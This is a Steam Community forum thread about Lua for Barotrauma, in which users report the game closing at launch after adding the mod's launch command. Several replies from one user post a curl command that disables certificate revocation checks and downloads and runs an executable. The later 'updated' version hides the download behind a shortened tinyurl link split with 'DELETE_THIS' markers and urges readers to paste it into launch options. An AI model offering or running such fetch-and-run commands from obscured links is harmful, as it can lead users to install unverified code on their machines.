Barotrauma

Barotrauma

Lua For Barotrauma
Wistful_Muse 15. dec. 2024 kl. 12:42
Help with Lua (not being able to launch the game)
Hi!

I recently subscribed to Lua via the Steam Workshop for the first time, and have followed all instructions on the workshop page.

I had went onto the properties page, placed the code for Windows into the launch options box and when I try to launch the game, it runs for a few seconds, a command console pops up and then the game stops running. I cannot get into the game. I have done all the troubleshooting options from the Workshop page and none of them have seemed to help.

When I remove the code from the launch options, it seems to work fine, but I'm not sure what I'm doing wrong here. Any insight would be appreciated, thank you! :)
< >
Viser 1-15 af 18 kommentarer
I'm having the exact same issue
Miriouki 9. jan. kl. 11:23 
Same issue here too
Fly_Cloud 10. jan. kl. 19:24 
well,same issue,I found a strong lag in the submarine editor.Every time an item is placed, there will be a lag of about 1 second.
Leonidas 17. jan. kl. 12:18 
I believe it's an issue with firewalls? Perhaps some antivirus
SuperErnie1751 19. jan. kl. 12:26 
The main issue can be the usage of an antivirus, disabling it would probably make it run fine.
Fly_Cloud 24. jan. kl. 23:35 
oh,I found the solution,I made an incorrect configuration in PF.I reinstalled PF and applied the default configuration.:happy_seagull:
Marmot 11. apr. kl. 19:39 
I've got a similar issue, I copied and pasted the entire windows install command since that's the OS I use but when I try opening the game I get a brief command console window that closes almost immediately and the game doesn't open at all
VanishGuy 28. apr. kl. 14:39 
!!!SOLUTION!!!
The problem occurs when the system cannot check the revocation status of the certificate because the revocation server (CRL) is unavailable. To solve the problem, you need to finalize the command.
cmd /c "curl --ssl-no-revoke -L -o Luatrauma.AutoUpdater.win-x64.exe https://github.com/Luatrauma/Luatrauma.AutoUpdater/releases/download/latest/Luatrauma.AutoUpdater.win-x64.exe && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
(--ssl-no-revoke disables certificate revocation checking)
VanishGuy, you are a sainte
Mephyst 5. maj kl. 15:19 
had the same problem, VanishGuy's solution above fixed it
VanishGuy 6. maj kl. 1:55 
Oprindeligt skrevet af Wistful_Muse:
Hi!

I recently subscribed to Lua via the Steam Workshop for the first time, and have followed all instructions on the workshop page.

I had went onto the properties page, placed the code for Windows into the launch options box and when I try to launch the game, it runs for a few seconds, a command console pops up and then the game stops running. I cannot get into the game. I have done all the troubleshooting options from the Workshop page and none of them have seemed to help.

When I remove the code from the launch options, it seems to work fine, but I'm not sure what I'm doing wrong here. Any insight would be appreciated, thank you! :)
UPDATED SOLUTION
I reached the character limit for the startup parameter command, had to shorten link

cmd /c "curl --ssl-no-revoke --retry 10 --retry-delay 10 --http1.1 -L -C - -o Luatrauma.AutoUpdater.win-x64.exe https://DELETE_THIStinyurl.DELETE_THIScom/mtbhfhp3 && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
Vainglorious 4. juli kl. 10:25 
Oprindeligt skrevet af VanishGuy:
!!!SOLUTION!!!
The problem occurs when the system cannot check the revocation status of the certificate because the revocation server (CRL) is unavailable. To solve the problem, you need to finalize the command.
cmd /c "curl --ssl-no-revoke -L -o Luatrauma.AutoUpdater.win-x64.exe https://github.com/Luatrauma/Luatrauma.AutoUpdater/releases/download/latest/Luatrauma.AutoUpdater.win-x64.exe && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
(--ssl-no-revoke disables certificate revocation checking)

i pasted this to my lunch options still same problem
VanishGuy 5. juli kl. 10:33 
Oprindeligt skrevet af Vainglorious:
Oprindeligt skrevet af VanishGuy:
!!!SOLUTION!!!
The problem occurs when the system cannot check the revocation status of the certificate because the revocation server (CRL) is unavailable. To solve the problem, you need to finalize the command.
cmd /c "curl --ssl-no-revoke -L -o Luatrauma.AutoUpdater.win-x64.exe https://github.com/Luatrauma/Luatrauma.AutoUpdater/releases/download/latest/Luatrauma.AutoUpdater.win-x64.exe && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
(--ssl-no-revoke disables certificate revocation checking)

i pasted this to my lunch options still same problem

Try this one.
cmd /c "curl --ssl-no-revoke --retry 10 --retry-delay 10 --http1.1 -L -C - -o Luatrauma.AutoUpdater.win-x64.exe https://DELETE_THIStinyurl.DELETE_THIScom/mtbhfhp3 && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
Alex 5. juli kl. 13:45 
The game doesnt start with after add text at windows
VanishGuy 6. juli kl. 8:40 
Oprindeligt skrevet af Alex:
The game doesnt start with after add text at windows
From your answer, as I understand, you inserted this command into the Windows console line, but this is not what is needed

You need to add the following text
1) rmb (on barotrauma)
2)properties
3)paste this text in launch properties:

cmd /c "curl --ssl-no-revoke --retry 10 --retry-delay 10 --http1.1 -L -C - -o Luatrauma.AutoUpdater.win-x64.exe https://DELETE_THIStinyurl.DELETE_THIScom/mtbhfhp3 && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"

DO NOT FORGET TO DELETE "DELETE_THIS" FROM COMMAND
< >
Viser 1-15 af 18 kommentarer
Per side: 1530 50